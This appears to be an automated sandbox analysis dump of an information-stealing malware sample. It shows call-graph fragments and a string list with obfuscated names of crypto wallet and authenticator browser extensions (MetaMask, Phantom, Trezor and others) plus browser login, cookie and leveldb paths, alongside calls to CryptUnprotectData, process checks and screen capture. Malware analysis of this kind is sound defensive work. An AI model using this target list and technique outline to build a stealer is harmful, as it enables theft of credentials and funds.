436af4 __fread_nolock __CreateFrameInfo _wctomb_s _strlen 74050->74063 74051 438e28 3 API calls 74056 438a76 GetPhysicallyInstalledSystemMemory 74051->74056 74052 438019 74052->73977 74053 436adc 176 API calls 74053->74063 74054 438e28 LoadLibraryW GetPEB lstrcmpiW 74054->74063 74055 434fac 15 API calls 74055->74063 74056->74063 74057 438b8c EnumDisplayDevicesA 74057->74063 74058 437265 KiUserCallbackDispatcher 74058->74063 74059 419e6b 127 API calls 74059->74063 74060 44568a 29 API calls 74060->74063 74062 434040 46 API calls 74062->74063 74063->74051 74063->74052 74063->74053 74063->74054 74063->74055 74063->74057 74063->74058 74063->74059 74063->74060 74063->74062 74064 41f9a4 58 API calls 74063->74064 74205 41d057 74063->74205 74211 44be84 43 API calls __wfreopen_s 74063->74211 74212 4360e1 74063->74212 74064->74063 74082 434090 __CreateFrameInfo _wctomb_s _strlen 74067->74082 74068 434f14 RegCloseKey 74068->74082 74069 434be9 RegQueryValueExW 74069->74082 74070 434f73 RegCloseKey 74070->74082 74071 434d8e RegOpenKeyExW 74071->74082 74072 434ce5 wsprintfW 74072->74082 74073 4346ce wsprintfW 74073->74082 74074 434706 RegEnumKeyExW 74074->74082 74075 434758 RegCloseKey 74075->74082 74076 434954 RegOpenKeyExW 74076->74082 74077 447a80 14 API calls ___vcrt_freefls@4 74077->74082 74078 4349e7 74078->73977 74080 434080 127 API calls 74080->74082 74081 419e6b 127 API calls 74081->74082 74082->74068 74082->74069 74082->74070 74082->74071 74082->74072 74082->74073 74082->74074 74082->74075 74082->74076 74082->74077 74082->74078 74082->74080 74082->74081 74217 419496 106 API calls 3 library calls 74082->74217 74090 433c23 74083->74090 74084 419e6b 127 API calls 74084->74090 74085 433d34 74087 4338b5 198 API calls 74087->74090 74089 434022 GetProcessHeap RtlFreeHeap 74089->73977 74090->74084 74090->74085 74090->74087 74090->74089 74091 43323b 198 API calls 74090->74091 74218 430e6c 74090->74218 74239 43350d 200 API calls 74090->74239 74240 432718 74090->74240 74091->74090 74094 421f01 74093->74094 74095 4220b5 GetPEB 74094->74095 74096 4279e0 GetPEB 74094->74096 74097 421f6c NtQueryInformationProcess 74094->74097 74098 42215d 74094->74098 74095->74094 74096->74094 74097->74094 74098->73977 74100 4224b4 74099->74100 74101 4227be NtQueryInformationProcess 74100->74101 74102 422795 GetPEB 74100->74102 74103 4279e0 GetPEB 74100->74103 74104 422802 74100->74104 74101->74100 74102->74100 74103->74100 74104->73977 74112 42cfd0 74105->74112 74106 42d5bb 74106->73977 74107 42b9c5 223 API calls 74107->74112 74108 42cfba 223 API calls 74108->74112 74109 42b9ae 206 API calls 74109->74112 74110 419b9d 72 API calls 74110->74112 74112->74106 74112->74107 74112->74108 74112->74109 74112->74110 74113 42c0da 223 API calls 74112->74113 74115 41a28f 182 API calls 74112->74115 74289 42ca0d 74112->74289 74304 42ad82 74112->74304 74113->74112 74115->74112 74130 4262bc __fread_nolock 74116->74130 74117 426972 74128 422177 55 API calls 74117->74128 74117->74130 74358 424c44 GetModuleFileNameW CreateFileW CloseHandle 74117->74358 74118 426847 RtlAdjustPrivilege 74119 4279e0 GetPEB 74118->74119 74119->74130 74121 4279e0 GetPEB 74121->74130 74122 426600 GetPEB 74122->74130 74123 4263c1 LoadLibraryA 74123->74130 74125 4269dc 74125->73977 74128->74117 74129 422817 17 API calls 74129->74130 74130->74117 74130->74118 74130->74121 74130->74122 74130->74123 74130->74125 74130->74129 74131 41f9a4 55 API calls 74130->74131 74132 4244e4 3 API calls 74130->74132 74355 41eb3f RaiseException 74130->74355 74356 424995 20 API calls 2 library calls 74130->74356 74357 426a42 GetPEB GetPEB 74130->74357 74131->74130 74132->74130 74133->74012 74139 401c31 74134->74139 74135 401ebc GetSystemTimeAsFileTime 74135->74139 74136 401ff9 7 API calls 74136->74139 74137 401c1e 7 API calls 74137->74139 74138 401f62 __aulldiv 74138->74022 74138->74138 74139->74135 74139->74136 74139->74137 74139->74138 74140 402fcc 7 API calls 74139->74140 74140->74139 74177 41f9bc 74141->74177 74142 421bb3 NtQuerySystemInformation 74142->74177 74143 421bff NtQuerySystemInformation 74143->74177 74144 42162a GetProcessId 74144->74177 74146 420e2d NtClose 74146->74177 74147 4228cf 51 API calls 74147->74177 74148 4245ec 51 API calls 74148->74177 74150 41f916 GetPEB VirtualQuery 74150->74177 74151 424b24 GetPEB HeapDestroy 74151->74177 74153 4202ad GetCurrentProcessId 74153->74177 74154 447a80 ___vcrt_freefls@4 14 API calls 74154->74177 74155 424995 20 API calls 74155->74177 74156 420593 NtDuplicateObject 74156->74177 74157 426a42 GetPEB GetPEB 74157->74177 74159 447e24 ___std_exception_copy 15 API calls 74159->74177 74160 4269e4 GetPEB GetPEB 74160->74177 74161 420a7a GetPEB 74161->74177 74162 4279e0 GetPEB 74162->74177 74163 421ee3 74163->74045 74164 41f536 51 API calls 74164->74177 74165 4262a1 51 API calls 74165->74177 74166 421eeb NtQueryInformationProcess GetPEB GetPEB 74166->74177 74167 422817 17 API calls 74167->74177 74171 420bb6 74171->74177 74193 424c44 GetModuleFileNameW CreateFileW CloseHandle 74171->74193 74194 424bed GetPEB GetModuleFileNameW CreateFileW CloseHandle 74171->74194 74195 4228cf 74171->74195 74172 4244e4 3 API calls 74172->74177 74174 4224a3 GetPEB NtQueryInformationProcess GetPEB 74174->74177 74175 41f9a4 51 API calls 74175->74177 74176 422177 51 API calls 74176->74177 74177->74142 74177->74143 74177->74144 74177->74146 74177->74147 74177->74148 74177->74150 74177->74151 74177->74153 74177->74154 74177->74155 74177->74156 74177->74157 74177->74159 74177->74160 74177->74161 74177->74162 74177->74163 74177->74164 74177->74165 74177->74166 74177->74167 74177->74171 74177->74172 74177->74174 74177->74175 74177->74176 74178 44814e 74177->74178 74191 424c8d 58 API calls ___std_exception_copy 74177->74191 74192 41eb3f RaiseException 74177->74192 74200 41ebeb 58 API calls 74177->74200 74201 41e6f0 58 API calls 74177->74201 74179 45699f 74178->74179 74180 4569b7 74179->74180 74181 4569ac 74179->74181 74183 4569bf 74180->74183 74189 4569c8 _unexpected 74180->74189 74182 44eb6f __fread_nolock 15 API calls 74181->74182 74188 4569b4 74182->74188 74186 44e224 __freea 14 API calls 74183->74186 74184 4569f2 RtlReAllocateHeap 74184->74188 74184->74189 74185 4569cd 74202 4447a4 14 API calls __dosmaperr 74185->74202 74186->74188 74188->74177 74189->74184 74189->74185 74203 44e560 EnterCriticalSection LeaveCriticalSection _unexpected 74189->74203 74191->74177 74192->74177 74193->74171 74194->74171 74196 422958 74195->74196 74204 424995 20 API calls 2 library calls 74196->74204 74198 4244a9 74199 4262a1 58 API calls 74198->74199 74199->74198 74200->74177 74201->74177 74202->74188 74203->74189 74204->74198 74206 447e24 ___std_exception_copy 15 API calls 74205->74206 74207 41d065 74206->74207 74208 438e28 3 API calls 74207->74208 74209 41d079 GetCurrentHwProfileA 74208->74209 74210 41d083 74209->74210 74210->74063 74211->74063 74216 436133 74212->74216 74213 43669e 74213->74063 74214 447e24 ___std_exception_copy 15 API calls 74214->74216 74215 4360e1 15 API calls 74215->74216 74216->74213 74216->74214 74216->74215 74217->74082 74236 430e85 74218->74236 74219 4321e3 GetDIBits ReleaseDC 74219->74236 74220 431d2b RtlAllocateHeap 74220->74236 74221 43323b 186 API calls 74221->74236 74222 431e4c GetObjectW 74222->74236 74223 432718 186 API calls 74223->74236 74224 4325bf GetProcessHeap 74224->74236 74225 432097 GetProcessHeap 74225->74236 74226 4326e0 GetProcessHeap RtlFreeHeap GetProcessHeap HeapFree 74226->74090 74227 431902 74228 433c10 186 API calls 74228->74236 74229 430f3a RtlAllocateHeap 74229->74236 74230 4228cf 58 API calls 74230->74236 74231 431c69 GetDC 74231->74236 74232 4314b2 GetProcessHeap 74232->74236 74233 4314e4 HeapAlloc 74233->74236 74234 430e6c 186 API calls 74234->74236 74235 432b1b 186 API calls 74235->74236 74236->74219 74236->74220 74236->74221 74236->74222 74236->74223 74236->74224 74236->74225 74236->74226 74236->74227 74236->74228 74236->74229 74236->74230 74236->74231 74236->74232 74236->74233 74236->74234 74236->74235 74237 43350d 186 API calls 74236->74237 74238 4338b5 186 API calls 74236->74238 74237->74236 74238->74236 74239->74090 74250 43272e 74240->74250 74241 432a76 CreateCompatibleBitmap 74241->74250 74242 432a26 BitBlt 74242->74250 74243 432a0e SelectObject 74243->74250 74244 432a5b SelectObject 74244->74250 74245 432893 CreateCompatibleDC 74245->74250 74246 432943 74247 432afb DeleteDC DeleteObject 74247->74090 74249 4338b5 193 API calls 74249->74250 74250->74241 74250->74242 74250->74243 74250->74244 74250->74245 74250->74246 74250->74247 74250->74249 74251 430e6c 193 API calls 74250->74251 74253 432718 193 API calls 74250->74253 74254 432b1b 74250->74254 74266 43350d 200 API calls 74250->74266 74251->74250 74253->74250 74260 432b24 74254->74260 74255 432eb3 SystemParametersInfoW 74255->74260 74256 433c10 197 API calls 74256->74260 74257 43302c GetDesktopWindow GetDC 74257->74260 74258 432fe8 74258->74250 74258->74258 74259 432b1b 197 API calls 74259->74260 74260->74255 74260->74256 74260->74257 74260->74258 74260->74259 74261 43350d 197 API calls 74260->74261 74262 430e6c 197 API calls 74260->74262 74263 4338b5 197 API calls 74260->74263 74264 432718 197 API calls 74260->74264 74267 43323b 74260->74267 74261->74260 74262->74260 74263->74260 74264->74260 74266->74250 74275 433253 74267->74275 74268 43341c GetSystemMetrics 74268->74275 74269 433448 74270 4333c1 GetSystemMetrics 74270->74275 74271 43327e CreateDCW 74271->74275 74272 432718 196 API calls 74272->74275 74273 4334f3 DeleteDC 74273->74260 74274 43350d 196 API calls 74274->74275 74275->74268 74275->74269 74275->74270 74275->74271 74275->74272 74275->74273 74275->74274 74277 4338b5 74275->74277 74278 4338cd 74277->74278 74279 432718 199 API calls 74278->74279 74280 4338b5 199 API calls 74278->74280 74281 4339bb 74278->74281 74282 433c10 199 API calls 74278->74282 74283 432b1b 199 API calls 74278->74283 74284 43323b 199 API calls 74278->74284 74285 433be8 74278->74285 74286 430e6c 199 API calls 74278->74286 74279->74278 74280->74278 74282->74278 74283->74278 74284->74278 74287 430e6c 199 API calls 74285->74287 74286->74278 74288 433bfc DeleteObject 74287->74288 74288->74275 74297 42ca20 74289->74297 74290 42ca0d 223 API calls 74290->74297 74291 40e14e 161 API calls 74291->74297 74292 42cb4e 74294 42cfa7 74299 447a80 ___vcrt_freefls@4 14 API calls 74294->74299 74295 447e24 ___std_exception_copy 15 API calls 74295->74297 74296 42ad82 223 API calls 74296->74297 74297->74290 74297->74291 74297->74292 74297->74294 74297->74295 74297->74296 74298 42cfba 223 API calls 74297->74298 74300 438e28 3 API calls 74297->74300 74301 40b7bb 43 API calls 74297->74301 74321 42b9ae 74297->74321 74324 42b9c5 74297->74324 74298->74297 74303 42cfb2 74299->74303 74300->74297 74301->74297 74303->74112 74320 42ad95 74304->74320 74305 447e24 15 API calls ___std_exception_copy 74305->74320 74306 438e28 LoadLibraryW GetPEB lstrcmpiW 74306->74320 74307 42b9ae 206 API calls 74307->74320 74308 42b7f1 74309 42b99e 74313 447a80 ___vcrt_freefls@4 14 API calls 74309->74313 74310 447a80 ___vcrt_freefls@4 14 API calls 74310->74320 74312 42cfba 223 API calls 74312->74320 74316 42b9a6 74313->74316 74314 42b9c5 223 API calls 74314->74320 74315 42ad82 223 API calls 74315->74320 74316->74112 74317 40e14e 161 API calls 74317->74320 74318 40b7bb 43 API calls 74318->74320 74319 42ca0d 223 API calls 74319->74320 74320->74305 74320->74306 74320->74307 74320->74308 74320->74309 74320->74310 74320->74312 74320->74314 74320->74315 74320->74317 74320->74318 74320->74319 74338 42c0da 74320->74338 74322 430228 206 API calls 74321->74322 74323 42b9c1 74322->74323 74323->74297 74337 42b9d5 74324->74337 74325 42b9c5 223 API calls 74325->74337 74326 42c04f 74327 42ad82 223 API calls 74327->74337 74328 42ca0d 223 API calls 74328->74337 74329 447e24 ___std_exception_copy 15 API calls 74329->74337 74330 438e28 3 API calls 74330->74337 74331 42c0ca 74333 447a80 ___vcrt_freefls@4 14 API calls 74331->74333 74332 42b9ae 206 API calls 74332->74337 74334 42c0d2 74333->74334 74334->74297 74335 40e14e 161 API calls 74335->74337 74336 40b7bb 43 API calls 74336->74337 74337->74325 74337->74326 74337->74327 74337->74328 74337->74329 74337->74330 74337->74331 74337->74332 74337->74335 74337->74336 74353 42c0ed 74338->74353 74339 42c878 74340 42c9fd 74346 447a80 ___vcrt_freefls@4 14 API calls 74340->74346 74341 42cfba 223 API calls 74341->74353 74342 42c0da 223 API calls 74342->74353 74343 447e24 15 API calls ___std_exception_copy 74343->74353 74344 42b9c5 223 API calls 74344->74353 74345 42ad82 223 API calls 74345->74353 74350 42ca05 74346->74350 74347 447a80 14 API calls ___vcrt_freefls@4 74347->74353 74348 40e14e 161 API calls 74348->74353 74349 42b9ae 206 API calls 74349->74353 74350->74320 74351 438e28 3 API calls 74351->74353 74352 42ca0d 223 API calls 74352->74353 74353->74339 74353->74340 74353->74341 74353->74342 74353->74343 74353->74344 74353->74345 74353->74347 74353->74348 74353->74349 74353->74351 74353->74352 74354 40b7bb 43 API calls 74353->74354 74354->74353 74355->74130 74356->74130 74358->74117 74359->73992 74360->73992 74362 443a37 74361->74362 74363 443a49 74361->74363 74388 4438d3 GetModuleHandleW 74362->74388 74373 443b8c 74363->74373 74366 443a3c 74366->74363 74389 443916 GetModuleHandleExW 74366->74389 74368 43ca83 74368->73948 74372 443a9b 74374 443b98 ___scrt_is_nonwritable_in_current_image 74373->74374 74395 44d13d EnterCriticalSection 74374->74395 74376 443ba2 74396 443aa1 74376->74396 74378 443baf 74400 443bcd 74378->74400 74381 4439ba 74405 443998 74381->74405 74384 4439d8 74386 443916 __CreateFrameInfo 3 API calls 74384->74386 74385 4439c8 GetCurrentProcess TerminateProcess 74385->74384 74387 4439e0 ExitProcess 74386->74387 74388->74366 74390 443955 GetProcAddress 74389->74390 74391 443976 74389->74391 74390->74391 74394 443969 74390->74394 74392 443985 74391->74392 74393 44397c FreeLibrary 74391->74393 74392->74363 74393->74392 74394->74391 74395->74376 74397 443aad ___scrt_is_nonwritable_in_current_image 74396->74397 74398 443b14 __CreateFrameInfo 74397->74398 74403 44446f 14 API calls 2 library calls 74397->74403 74398->74378 74404 44d154 LeaveCriticalSection 74400->74404 74402 443a80 74402->74368 74402->74381 74403->74398 74404->74402 74410 44fb15 GetPEB 74405->74410 74408 4439a2 GetPEB 74409 4439b4 74408->74409 74409->74384 74409->74385 74411 44399d 74410->74411 74412 44fb2f 74410->74412 74411->74408 74411->74409 74414 44ced5 74412->74414 74417 44cfe0 74414->74417 74418 44d00e 74417->74418 74423 44cef1 74417->74423 74418->74423 74424 44cf15 74418->74424 74421 44d028 GetProcAddress 74422 44d038 _unexpected 74421->74422 74421->74423 74422->74423 74423->74411 74430 44cf26 ___vcrt_FlsFree 74424->74430 74425 44cfbc 74425->74421 74425->74423 74426 44cf44 LoadLibraryExW 74427 44cfc3 74426->74427 74428 44cf5f GetLastError 74426->74428 74427->74425 74429 44cfd5 FreeLibrary 74427->74429 74428->74430 74429->74425 74430->74425 74430->74426 74431 44cf92 LoadLibraryExW 74430->74431 74431->74427 74431->74430 74432 450330 74438 45033d _unexpected 74432->74438 74433 45037d 74440 4447a4 14 API calls __dosmaperr 74433->74440 74434 450368 RtlAllocateHeap 74436 45037b 74434->74436 74434->74438 74438->74433 74438->74434 74439 44e560 EnterCriticalSection LeaveCriticalSection _unexpected 74438->74439 74439->74438 74440->74436 74441 404c06 74442 404c19 74441->74442 74447 40a3c6 74442->74447 74444 404c66 74446 404c25 74446->74444 74452 4040f8 16 API calls _strlen 74446->74452 74448 40a428 74447->74448 74449 40a46d 74447->74449 74450 447e24 15 API calls 74448->74450 74451 44eb6f 15 API calls 74448->74451 74449->74446 74450->74449 74451->74449 74452->74446 74453 426b04 74454 426b49 __fread_nolock 74453->74454 74455 447e24 ___std_exception_copy 15 API calls 74454->74455 74456 426f39 74454->74456 74455->74454 74457 447a80 ___vcrt_freefls@4 14 API calls 74456->74457 74458 426f52 74457->74458 74459 7999ce 74460 7999dd 74459->74460 74463 79a16e 74460->74463 74464 79a189 74463->74464 74465 79a192 CreateToolhelp32Snapshot 74464->74465 74466 79a1ae Module32First 74464->74466 74465->74464 74465->74466 74467 79a1bd 74466->74467 74468 7999e6 74466->74468 74470 799e2d 74467->74470 74471 799e58 74470->74471 74472 799e69 VirtualAlloc 74471->74472 74473 799ea1 74471->74473 74472->74473 74473->74473 74474 4052d9 74475 4052ee __fread_nolock 74474->74475 74476 405900 74475->74476 74477 438e28 3 API calls 74475->74477 74480 438e28 3 API calls 74475->74480 74481 40b129 43 API calls 74475->74481 74483 447e24 15 API calls ___std_exception_copy 74475->74483 74486 447a80 ___vcrt_freefls@4 14 API calls 74475->74486 74487 4035d1 45 API calls 74475->74487 74488 405aaa 74475->74488 74508 434fac 74475->74508 74476->74476 74477->74475 74482 405567 CryptUnprotectData 74480->74482 74481->74475 74484 447a80 ___vcrt_freefls@4 14 API calls 74482->74484 74483->74475 74484->74475 74486->74475 74487->74475 74503 405ac3 __CreateFrameInfo 74488->74503 74489 406018 lstrcatW 74489->74503 74490 405ebc lstrcatW 74492 4360e1 15 API calls 74490->74492 74491 405eed lstrcatW 74498 4360e1 15 API calls 74491->74498 74497 405ed0 lstrcatW lstrcatW 74492->74497 74494 405be7 lstrcatW 74494->74503 74496 4060e6 74496->74496 74497->74503 74501 405eff lstrcatW lstrcatW 74498->74501 74499 405bb6 74504 4360e1 15 API calls 74499->74504 74500 403600 101 API calls 74500->74503 74501->74503 74503->74489 74503->74490 74503->74491 74503->74494 74503->74496 74503->74499 74503->74500 74514 404edc 16 API calls 74503->74514 74515 4048e2 46 API calls 74503->74515 74516 404988 46 API calls 74503->74516 74505 4061ef 74504->74505 74506 40e14e 161 API calls 74505->74506 74507 406203 74506->74507 74507->74475 74512 434fc2 _strcat _strncpy _strlen 74508->74512 74509 447e24 ___std_exception_copy 15 API calls 74509->74512 74510 435e8e 74510->74475 74511 434fac 15 API calls 74511->74512 74512->74509 74512->74510 74512->74511 74513 4360e1 15 API calls 74512->74513 74513->74512 74514->74503 74515->74503 74516->74503 74517 233003c 74518 2330049 74517->74518 74532 2330e0f SetErrorMode SetErrorMode 74518->74532 74523 2330265 74524 23302ce VirtualProtect 74523->74524 74526 233030b 74524->74526 74525 2330439 VirtualFree 74530 23304be 74525->74530 74531 23305f4 LoadLibraryA 74525->74531 74526->74525 74527 23304e3 LoadLibraryA 74527->74530 74529 23308c7 74530->74527 74530->74531 74531->74529 74533 2330223 74532->74533 74534 2330d90 74533->74534 74535 2330dad 74534->74535 74536 2330238 VirtualAlloc 74535->74536 74537 2330dbb GetPEB 74535->74537 74536->74523 74537->74536 74538 4102de 74539 44814e 16 API calls 74538->74539 74540 4102f1 74539->74540
                                                          APIs
                                                          • lstrcatW.KERNEL32(?,?), ref: 00406AFC
                                                          • lstrcatW.KERNEL32(?,\Local Storage\leveldb), ref: 00406B06
                                                          • lstrcatW.KERNEL32(?,?,?), ref: 00408A66
                                                          • lstrcatW.KERNEL32(?,/BrowserDB), ref: 00408A70
                                                          Strings
                                                          • bln576xedieiiffboi576xedllknjnepogjhkgnoapac, xrefs: 00408804
                                                          • ookjlb576xedkiijinhpmnjffcofj576xedonbfbgaoc, xrefs: 00407F69
                                                          • cphhlg576xedmgameodnhkjdmkpa576xednlelnlohao, xrefs: 00407CC1
                                                          • ffn576xedbelfdoeiohenk576xedjibnmadjiehjhajb, xrefs: 00408152
                                                          • ppbibelpc576xedjmhbdihakflkd576xedcoccbgbkpo, xrefs: 004082E5
                                                          • dmkam576xedcknogkgcdfhhbddcghach576xedkejeap, xrefs: 004084B0
                                                          • Ste576xedem Key576xedchain, xrefs: 0040827B
                                                          • nkd576xeddgncdjgjfcddamfg576xedcmfnlhccnimig, xrefs: 00407C99
                                                          • Sol576xedlet, xrefs: 004088F4
                                                          • ijmp576xedgkjfkbfho576xedebgogflfebnmejmfbml, xrefs: 00407FE3
                                                          • Tr576xedezor Passw576xedord Manager, xrefs: 00408207
                                                          • Sa576xedturn, xrefs: 00407C8A
                                                          • ilgcn576xedhelpchnceeipipij576xedaljkblbcobl, xrefs: 004072A7
                                                          • hpg576xedlfhgfnhbgpjden576xedjgmdgoeiappafln, xrefs: 0040768A
                                                          • Bi576xedtClip, xrefs: 00407FD4
                                                          • Hy576xedcon Lite Cli576xedent, xrefs: 004080C7
                                                          • Te576xedmple, xrefs: 00408068
                                                          • Yo576xedroi, xrefs: 00408143
                                                          • ICO576xedNex, xrefs: 004075D4
                                                          • nlgbh576xeddfgdhgbiamfdfmb576xedikcdghidoadd, xrefs: 00407D4F
                                                          • DAp576xedpPlay, xrefs: 00407FAC
                                                          • cnma576xedmaachppnkjgnil576xeddpdmkaakejnhae, xrefs: 00407593
                                                          • VL6T, xrefs: 0040891C
                                                          • jbd576xedaocneiiinmjbj576xedlgalhcelgbejmnid, xrefs: 00407D6E
                                                          • \Local Storage\leveldb, xrefs: 00406AFE
                                                          • Ke576xedplr, xrefs: 004084A0
                                                          • Aut576xedhenti576xedcator, xrefs: 004074BA
                                                          • Te576xedrra Stat576xedion, xrefs: 0040724B
                                                          • NeoL576xedine, xrefs: 00407CB2
                                                          • Gu576xedild, xrefs: 004081EB
                                                          • Nab576xedox, xrefs: 00408018
                                                          • By576xedone, xrefs: 004076ED
                                                          • imloif576xedkgjagghnncjkhgg576xeddhalmcnfklk, xrefs: 00408216
                                                          • fhbohimaelboh576xedpjbbldcngcnapn576xeddodjp, xrefs: 00408128
                                                          • Uni576xedSat, xrefs: 004082D2
                                                          • Tro576xednLi576xednk, xrefs: 00407616
                                                          • lkcjl576xednjfpbikmcm576xedbachjpdbijejflpcm, xrefs: 00408084
                                                          • nhnk576xedbkgjikgcigadomkph576xedalanndcapjk, xrefs: 004087BC
                                                          • EeS, xrefs: 00407043
                                                          • afbc576xedbjpbpfadlkmhm576xedclhkeeodmamcflc, xrefs: 004083E2
                                                          • kkpllko576xeddjeloidieedojogacfhp576xedaihoh, xrefs: 004088A7
                                                          • nanj576xedmdknhkinifnkgdcggcfnhd576xedaammmj, xrefs: 00407D13
                                                          • Au576xedro, xrefs: 00407584
                                                          • Bin576xedance Cha576xedin Wal576xedlet, xrefs: 004085F6
                                                          • W576xedeb Da576xedta, xrefs: 00408697
                                                          • infe576xedboajgfhgbjpjbeppbkg576xednabfdkdaf, xrefs: 00407868
                                                          • cj576xedelfplplebdjjenllpjcbl576xedmjkfcffne, xrefs: 0040882E
                                                          • Ma576xedth, xrefs: 004083D3
                                                          • One576xedKey, xrefs: 00407859
                                                          • Netw576xedork\Cook576xedies, xrefs: 00408505
                                                          • Gua576xedrda, xrefs: 00408423
                                                          • bfn576xedaelmomeim576xedhlpmgjnjophhpkkoljpa, xrefs: 00408242
                                                          • onof576xedpnbbkehpmmoa576xedbgpcpmigafmmnjhl, xrefs: 004080AE
                                                          • bhgho576xedamapcdpbohphigoo576xedoaddinpkbai, xrefs: 004074C9
                                                          • EeS, xrefs: 00406B7F
                                                          • Au576xedthy, xrefs: 00406CF1
                                                          • EQ576xedUAL, xrefs: 004076A5
                                                          • Me576xedtaMa576xedsk, xrefs: 00406E46, 004087D8
                                                          • EnK576xedrypt, xrefs: 00408897
                                                          • hcflp576xedincpppdclinealmandi576xedjcmnkbgn, xrefs: 0040804F
                                                          • Hist576xedory, xrefs: 0040867F
                                                          • flpici576xedilemghbmfalica576xedjoolhkkenfel, xrefs: 004075E4
                                                          • Log576xedin Da576xedta Fo576xedr Acc576xedount, xrefs: 00408667
                                                          • fhmfend576xedgdocmcbmfikdcog576xedofphimnkno, xrefs: 00408903
                                                          • bcopg576xedchhojmggmff576xedilplmbdicgaihlkp, xrefs: 004080DA
                                                          • ME576xedW CX, xrefs: 004073DD
                                                          • Liqu576xedality, xrefs: 00407EDD
                                                          • ejbalbako576xedplchlghecda576xedlmeeeajnimhm, xrefs: 00406E55
                                                          • nkbihfbeo576xedgaeaoehlef576xednkodbefgpgknn, xrefs: 004087E8
                                                          • fnjhmkhhmkb576xedjkkabndcn576xednogagogbneec, xrefs: 004085DD
                                                          • fihka576xedkfobkmkjojpchpf576xedgcmhfjnmnfpi, xrefs: 00408856
                                                          • Zi576xedlPay, xrefs: 0040746A
                                                          • aea576xedchknmefphepccio576xednboohckonoeemg, xrefs: 004074A1
                                                          • kn576xedcchdigobgh576xedenbbaddojjnnaogfppfj, xrefs: 0040887E
                                                          • GAu576xedth Authe576xednticator, xrefs: 00407298
                                                          • nlbm576xednnijcnlegkjjpcfjclm576xedcfggfefdm, xrefs: 004081D0
                                                          • VL6T, xrefs: 004076C1
                                                          • dkded576xedlpgdmmkkfjabffeg576xedanieamfklkm, xrefs: 00407AF8
                                                          • jojhf576xedeoedkpkglbfimdfabp576xeddfjaoolaf, xrefs: 004075BB
                                                          • His576xedtory, xrefs: 004083AF
                                                          • KH576xedC, xrefs: 00408040
                                                          • oel576xedjdldpnmdbchonieli576xeddgobddffflal, xrefs: 00406D28
                                                          • Pha576xedntom, xrefs: 0040822F
                                                          • Na576xedsh Ex576xedtension, xrefs: 0040809F
                                                          • Cy576xedano, xrefs: 00407AE5
                                                          • kpfop576xedkelmapcoipemfend576xedmdcghnegimn, xrefs: 00407EED
                                                          • Le576xedaf, xrefs: 00407881
                                                          • Pol576xedymesh, xrefs: 004075AC
                                                          • Bit576xedApp, xrefs: 00408847
                                                          • Ron576xedin Wall576xedet, xrefs: 004085CE
                                                          • gae576xeddmjdfmmahhbj576xedefcbgaolhhanlaolb, xrefs: 00406D00
                                                          • aiifb576xednbfobpmeekiphe576xedeijimdpnlpgpp, xrefs: 0040725B
                                                          • kln576xedaejjgbibmhlephnh576xedpmaofohgkpgkd, xrefs: 00407479
                                                          • ibnejdfjmmk576xedpcnlpebklmnk576xedoeoihofec, xrefs: 00407625
                                                          • amkmj576xedjmmflddogmhpjloim576xedipbofnfjih, xrefs: 004073C2
                                                          • Te576xedzBox, xrefs: 00407F84
                                                          • mnfif576xedefkajgofkcjkemidiae576xedcocnkjeh, xrefs: 00407F93
                                                          • cihm576xedoadaighcej576xedopammfbmddcmdekcje, xrefs: 004086BB
                                                          • hnfanknocfe576xedofbddgcijnm576xedhnfnkdnaad, xrefs: 0040840A
                                                          • iW576xedlt, xrefs: 0040886F
                                                          • Lo576xedgin Da576xedta, xrefs: 0040864F
                                                          • Ni576xedfty, xrefs: 0040816B
                                                          • Coinb576xedase, xrefs: 004083FB
                                                          • E576xedOS Authenti576xedcator, xrefs: 00406D19
                                                          • Wom576xedbat, xrefs: 004077AD
                                                          • Ja576xedxx Lib576xederty, xrefs: 0040881F
                                                          • /BrowserDB, xrefs: 00408A68
                                                          • UL6T, xrefs: 0040702D
                                                          • nknhi576xedehlklippafakaeklbegl576xedecifhad, xrefs: 00408027
                                                          • Coi576xedn98, xrefs: 00407492
                                                          • lodccj576xedjbdhfakaekdiahmedf576xedbieldgik, xrefs: 00407FBB
                                                          • Cl576xedover, xrefs: 004087AC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcat
                                                          • String ID: /BrowserDB$Au576xedro$Au576xedthy$Aut576xedhenti576xedcator$Bi576xedtClip$Bin576xedance Cha576xedin Wal576xedlet$Bit576xedApp$By576xedone$Cl576xedover$Coi576xedn98$Coinb576xedase$Cy576xedano$DAp576xedpPlay$E576xedOS Authenti576xedcator$EQ576xedUAL$EnK576xedrypt$EeS$EeS$GAu576xedth Authe576xednticator$Gu576xedild$Gua576xedrda$His576xedtory$Hist576xedory$Hy576xedcon Lite Cli576xedent$ICO576xedNex$Ja576xedxx Lib576xederty$KH576xedC$Ke576xedplr$Le576xedaf$Liqu576xedality$Lo576xedgin Da576xedta$Log576xedin Da576xedta Fo576xedr Acc576xedount$ME576xedW CX$Ma576xedth$Me576xedtaMa576xedsk$Na576xedsh Ex576xedtension$Nab576xedox$NeoL576xedine$Netw576xedork\Cook576xedies$Ni576xedfty$One576xedKey$Pha576xedntom$Pol576xedymesh$Ron576xedin Wall576xedet$Sa576xedturn$Sol576xedlet$Ste576xedem Key576xedchain$Te576xedmple$Te576xedrra Stat576xedion$Te576xedzBox$Tr576xedezor Passw576xedord Manager$Tro576xednLi576xednk$UL6T$Uni576xedSat$VL6T$VL6T$W576xedeb Da576xedta$Wom576xedbat$Yo576xedroi$Zi576xedlPay$\Local 